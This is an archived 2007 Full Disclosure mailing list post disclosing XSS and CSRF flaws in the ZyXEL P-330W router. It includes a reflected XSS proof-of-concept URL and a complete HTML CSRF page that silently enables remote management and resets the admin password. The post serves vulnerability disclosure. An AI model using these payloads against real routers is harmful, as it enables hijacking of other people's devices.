Full Disclosure mailing list archives
Re: Ho Ho H0-Day - ZyXEL P-330W multiple XSS and XSRF vulnerabilities
From: "Santa Clause" <santa_clause () hush com>
Date: Thu, 27 Dec 2007 20:27:31 -0600
Also, because the router uses GoAhead 2.1.1 for its embedded web server, it is susceptible to all those vulnerabilities including CVE-2002-1951 (buffer overflow), CVE-2002-1603 (ASP source disclosure), and more. -Santa On Tue, 25 Dec 2007 13:31:20 -0600 Santa Clause <santa_clause () hush com> wrote:
ZyXEL P-330W “Secure Wireless Internet Sharing Router” is vulnerable to multiple XSS and XSRF attacks. There are a plethora of XSS vulns in the web-based management interface so I'll leave it to you to discover these gifts on your own. Here is a starting point: http://<router_ip>:<router_port>/ping.asp?pingstr=”><script>alert(" M erry Christams")</script> Additionally, no measures are taken to prevent XSRF so pretty much the whole web-based interface is vulnerable. Here is an example of a web page that if loaded by the victim, turns on remote router management on port 8080 and changes the admin password to "santa_pw": <html><head><title>Chirstmastime is Here</title></head><body> <img src="http://<router_ip>:<router_port>/goform/formRmtMgt?webWanAcces s =ON&remoteMgtPort=80 80&pingWANEnabled=&upnpEnabled=&WANPassThru1=&WANPassThru2=&WANPass T hru3=& submit-url=%2Fremotemgt.asp" width="0" height="0"> <img src="http://<router_ip>:<router_port>/goform/formPasswordSetup?user n ame=admin&newpass=santa_pw &confpass=santa_pw&submit-url=%2Fstatus.asp&save=Save" width="0" height="0"> </body> </html> Of course, for any of these attacks to be successful the victim has to be recently logged in to the router. Hope everyone has a Merry Christmas and please don't think Santa is a lamer because he posted XSS and XSRF (hey, I've been busy delivering toys all night and needed a little pick-me-up). Merry XSSmas, peace on earth, and this year, give the gift of input validation. -- Win the battle of the bulge with great liposuction solutions. Click now! http://tagline.hushmail.com/fc/Ioyw6h4eJlsMHREnhDoPYTILkqINo7u2mZMY 2VpNJWbRfE1IZE7gfO/ -Santa Clause _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html
-- Orchard Bank MasterCard Get your credit on track with an Orchard Bank MasterCard http://tagline.hushmail.com/fc/JKFkuIjyKFiReuJJqj6WXpV7qcUIj2tOJ1IyWmF1ubEN8NgLe7eZXi/
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: Ho Ho H0-Day - ZyXEL P-330W multiple XSS and XSRF vulnerabilities Santa Clause (Dec 27)